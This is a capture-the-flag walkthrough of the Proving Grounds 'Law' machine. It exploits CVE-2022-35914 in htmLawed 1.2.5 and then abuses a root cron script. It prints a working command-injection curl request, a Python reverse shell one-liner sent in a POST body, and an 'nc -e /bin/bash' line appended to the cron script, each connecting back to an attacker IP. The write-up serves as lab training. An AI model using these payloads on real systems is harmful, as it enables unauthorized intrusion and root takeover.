PG - Law

PG – Law

In this walk through, we will be going through the Law room from Proving Grounds. This room is rated as Intermediate on the platform and it consist of exploitation of CVE-2022-35914 in HTMLawed 1.2.5 to get the initial access. For Privilege escalation, abuse of a cron job via a bash script file is required to get root. So, let’s get started without any delay.

Law

Machine Info:

TitleLaw
IPaddress192.168.197.190
DifficultyIntermediate
OSLinux
DescriptionLaw is an Intermediate Linux machine which is vulnerable to CVE-2022-35914 that leads to the intial foothold on the server. The privilege escalation abuses a cron job to get root via a bash script file.

Enumeration:

  • I started off with a regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.197.190
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-01 23:16 IST

Nmap scan report for 192.168.197.190
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.4p1: 
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-41617	3.5	https://vulners.com/prion/PRION:CVE-2021-41617
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: htmLawed (1.2.5) test
| vulners: 
|   cpe:/a:apache:http_server:2.4.56: 
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	OSV:BIT-APACHE-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|     	OSV:BIT-APACHE-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|     	OSV:BIT-APACHE-2023-31122	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2023-43622	5.0	https://vulners.com/cve/CVE-2023-43622
|     	CVE-2023-31122	5.0	https://vulners.com/cve/CVE-2023-31122
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|_    	CVE-2023-45802	2.6	https://vulners.com/cve/CVE-2023-45802
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/1%OT=22%CT=1%CU=30749%PV=Y%DS=4%DC=T%G=Y%TM=65BBD93A
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M5
OS:4EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O
OS:6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D
OS:F=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=CDE
OS:8%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   245.87 ms 192.168.45.1
2   245.83 ms 192.168.45.254
3   245.92 ms 192.168.251.1
4   246.02 ms 192.168.197.190

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.97 seconds

nmap scan

  • Enumerated the web server running on port 80 reveals that the HTMLawed 1.2.5 application is running on that.

 HTMLawed 1.2.5 application

Initial Access:

CVE-2022-35914

  • Looked for any known exploits for the concerned version online. Found out that it is vulnerable to CVE-2022-35914 which can be used to get code execution on the target. I used the below exploit code in the Burpsuite intercepted request in order to execute commands on the target.

Exploit: https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/POC_2022-35914.sh

curl -s -d 'sid=foo&hhook=exec&text=id' -b 'sid=foo' http://192.168.197.190/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'

Burpsuite POST request

www-data

  • Next, we will encode the below python reverse shell one liner and add it to our exploit code payload. Once the request is executed on the target, we will receive a connection back at our netcat listener.

python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",4444));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

sid=qaj8hc4pg37qu5e97m3i5r0p7l&hhook=exec&text=python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",80));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

injecting payload

got initial access

  • Captured the local flag.

local flag

Privilege Escalation:

  • Next, i found out a bash script in my current working folder. Seems like it got executed by root at certain intervals.

cat cleanup.sh

  • So, i added the below command in the script that will use the netcat binary to connect to my listener at 4444 if it gets executed. Hopefully, getting the shell as root.

echo 'nc 192.168.45.214 4444 -e /bin/bash' >> cleanup.sh

adding reverse shell one-liner to cleanup.sh

  • The same happened and at last captured the root flag to mark the machine as complete.

got root

proof flag

Also Read: PG – Jacko

Conclusion:

Conclusion

So that was “Law” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Enumerated the webserver on port 80 and found HTMLawed 1.2.5 application running. Looked online for any known exploit and found out that it is vulnerable to CVE-2022-35914. So, used the same to get initial foothold on the target. For Privilege escalation, abused a cron job that is running as root by adding a reverse shell one-liner in the scheduled bash script sile, which eventually gave us root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top